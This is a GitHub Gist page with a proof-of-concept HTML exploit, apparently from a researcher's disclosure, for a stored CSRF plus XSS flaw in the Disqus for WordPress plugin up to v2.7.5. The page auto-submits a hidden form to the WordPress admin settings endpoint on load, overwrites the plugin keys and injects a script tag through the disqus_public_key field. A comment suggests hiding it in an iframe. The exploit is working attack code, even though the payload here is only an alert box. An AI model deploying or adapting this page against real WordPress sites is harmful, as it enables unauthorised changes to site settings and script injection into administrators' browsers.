Created
August 13, 2014 02:20
-
-
Save nikcub/cb5dc7a5464276c8424a to your computer and use it in GitHub Desktop.
Disqus for Wordpress v2.7.5 XSS Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Exploit for Disqus for Wordpress admin stored CSRF+XSS up to v2.7.5 | |
Blog post explainer: https://www.nikcub.com/posts/multiple-vulnerabilities-in-disqus-wordpress-plugin/ | |
12th August 2014 | |
Nik Cubrilovic - www.nikcub.com | |
Most of these params are unfiltered/injectable. Not framable on newer Wordpress. | |
--> | |
<body onload="javascript:document.forms[0].submit()"> | |
<form action="http://wordpress.dev/wp-admin/edit-comments.php?page=disqus" method="post" class="dashboard-widget-control-form"> | |
<h1>disqus csrf reset</h1> | |
<!-- Idea for you: Iframe it --> | |
<input name="disqus_forum_url" type="hidden" value="wordpress342222222" /> | |
<input name="disqus_replace" type="hidden" value="all" /> | |
<!-- <input name="disqus_partner_key" type="hidden" value="1" /> --> | |
<input name="disqus_cc_fix" type="hidden" value="1" /> | |
<input name="disqus_partner_key" type="hidden" value="1" /> | |
<input name="disqus_secret_key" type="hidden" value="1" /> | |
<!-- Your File: <input name="disqus_sso_button" type="file" /><br /> --> | |
<input type="submit" value="save" /> | |
<input name="disqus_public_key" type="hidden" value='</textarea><script>alert(1);</script><textarea>' /> | |
</form> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment